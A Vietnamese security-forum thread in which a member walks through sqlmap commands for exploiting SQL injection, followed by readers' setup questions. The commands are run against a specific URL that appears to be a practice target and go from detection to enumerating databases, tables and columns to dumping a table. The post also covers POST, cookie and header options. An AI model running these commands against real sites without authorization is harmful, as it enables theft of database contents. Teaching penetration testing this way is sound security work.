Hướng Dẫn Sử Dụng SQLMAP để Khai Thác SQL Injection

Trang chủ » Cách Sử Dụng Sqlmap » Hướng Dẫn Sử Dụng SQLMAP để Khai Thác SQL Injection

Có thể bạn quan tâm

WhiteHat.vn
  • Tin Tức Tin tức An ninh mạng Bản tin WhiteHat
  • Thành viên
  • Có gì mới
  • Video
  • Wargame
  • Vinh Danh
Đăng nhập

Tìm kiếm

Toàn bộ Chủ đề Diễn đàn này This thread Chỉ tìm trong tiêu đề Bởi: Tìm Tìm nâng cao…
  • Hoạt động gần đây
  • Đăng ký
WhiteHat.vn Đăng nhập Đăng ký Giới thiệu Liên hệ

CỘNG ĐỒNG AN NINH MẠNG VIỆT NAM

@ 2009 - 2021 Bkav Corporation

Install the app Install
  • Thảo luận
  • Web Security
You are using an out of date browser. It may not display this or other websites correctly.You should upgrade or use an alternative browser. Hướng dẫn sử dụng SQLMAP để khai thác SQL Injection
  • Bắt đầu nonellldd
  • Ngày bắt đầu 08/03/2017
Chia sẻ: Facebook Twitter Reddit Pinterest Tumblr WhatsApp Email Chia sẻ Liên kết N

nonellldd

Guest
Hướng dẫn sử dụng SQLMAP để khai thác SQL Injection Có bạn ez101 nói không hiểu rõ bài https://whitehat.vn/forum/thao-luan/...tool-khai-thac Mình sẽ giải thích các lệnh sử dụng trong bài viết và giới thiệu thêm một số tùy chọn khác của SQLMAP Đầu tiên SQLMAP bạn có thể download tại http://tools.whitehat.vn/download (Cần cài đặt python https://www.python.org/downloads/) ok, bắt đầu với lệnh đầu tiên Lệnh 1 Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” "-u" theo sau là đường dẫn Lệnh này để kiểm tra url trên có dính lỗi sqli không Lệnh 2 Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs Khi đã xác định được url trên bị lỗi, sử dụng flag "--dbs" để liệt kê các database Lệnh 3 Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf Như trong bài viết đã liệt kê được 2 database là my_zerocoolhf và infomation_schema -D my_zerocoolhf: báo cho sqlmap.py biết chương trình sẽ làm việc với database my_zerocoolhf --table: dùng để liệt kê các bảng trong database my_zerocoolhf Lệnh 4 Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book Lệnh 3 đã liệt kê ra các bảng của my_zerocoolhf, lệnh 4 dùng để liệt kê ra tên cột có trong bảng book sự khác biệt giữa -T và --table là --table dùng để liệt kê, -T là lựa chọn để chương trình làm việc với bảng book Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book --dump: dùng để dump toàn bộ dữ liệu của bảng book Một số tùy chọn khác của sqlmap: Mã: --data="DATA" : sử dụng cho phương thức POST, ex: khi login thường hay sử dụng python sqlmap.py -u "url/path" --data "user=mark&passwd=line" Mã: --cookie="cookie" : sử dụng khi lỗ hổng nằm trong cookie Mã: --user-agent=AGENT : có thể ứng dụng kiểm tra trường user-agent trong header nên tùy chọn --user-agent sử dụng trong trường hợp này ex: python sqlmap.py -u "url/path" --data "user=mark&passwd=line" --user-agent "Mozilla/5.0 (Linux; ; ) AppleWebKit/ (KHTML, like Gecko) Chrome/ Mobile Safari/" (user-agent của chrome trên android) Mã: --header HEADER | --headers HEADERS khi request cần thêm một số trường thì -H (--headers) được sử dụng Còn rất nhiều các tùy chọn hữu ích thường được sử dụng để khai thác sqli bằng sqlmap, có thểm tham khảo thêm tại https://github.com/sqlmapproject/sqlmap/wiki/Usage hoặc sử dụng python sqlmap.py --help Chúc các mem nữ 8.3 vui vẻ nonellldd​ Chỉnh sửa lần cuối: 08/03/2017 Hay quá anh ơi!!! Comment Anh ơi , em làm như anh nhưng nó ghi : python: can't open file 'sqlmap.py': [Errno 2] No such file or directory Comment hình như sqlmap có mấy kiểu nhất định, có mấy cái như admin.php?vs=null thì nó báo lỗi, không biết mấy cái này thì phải làm sao ?? Comment
nguyenmanhson;n63631 đã viết: Anh ơi , em làm như anh nhưng nó ghi : python: can't open file 'sqlmap.py': [Errno 2] No such file or directory Nhấn để mở rộng...
Bạn nên hiểu là sqlmap là một tool opensource, và nó được chạy trên Python. Mod #nonelldd thực ra là đang dùng source bên ngoài chưa được gán vào Variable Environment. trong kali thì có sẵn. hoặc bạn có thể download sqlmap từ source này. http://sqlmap.org/ Comment
nguyenmanhson;n63631 đã viết: Anh ơi , em làm như anh nhưng nó ghi : python: can't open file 'sqlmap.py': [Errno 2] No such file or directory Nhấn để mở rộng...
sao bạn k xài kali luôn cho tiện?? Comment
nguyenmanhson;n63631 đã viết: Anh ơi , em làm như anh nhưng nó ghi : python: can't open file 'sqlmap.py': [Errno 2] No such file or directory Nhấn để mở rộng...
Bạn cho mình xin 500 hình ảnh được không :))) Comment cho em hỏi là cách cài đặt trên MacOS củng giống như Windows phải không ạ? Comment upload_2019-3-31_20-50-16.png cho mình hỏi sao nó báo không công nhận vậy ạ? em xin cảm ơn Comment
End đã viết: View attachment 4820 cho mình hỏi sao nó báo không công nhận vậy ạ? em xin cảm ơn Nhấn để mở rộng...
bác xem lại python đi Comment Bạn phải đăng nhập hoặc đăng ký để phản hồi tại đây. Bài viết liên quan
  • Một vài phương pháp vượt qua tường lửa ứng dụng web để tìm lỗ hổng XSS
    • Ngày bắt đầu 15/05/2021
    • 0
  • Hướng dẫn kết xuất và phân tích lưu lượng mạng với Tshark
    • Ngày bắt đầu 29/02/2020
    • 0
  • Hướng dẫn đổi port Remote Desktop
    • Ngày bắt đầu 17/02/2019
    • 4
  • Hướng dẫn bóc tách và phân tích KeyLogger
    • Ngày bắt đầu 29/09/2018
    • 2
  • Hướng dẫn vá lỗ hổng DoS trên WordPress - CVE-2018-6389
    • Ngày bắt đầu 08/02/2018
    • 0
  • [CMKT] Hướng dẫn quét lỗ hổng website với Acunetix WVS
    • Ngày bắt đầu 21/07/2017
    • 5
    • Bên trên

    Từ khóa » Cách Sử Dụng Sqlmap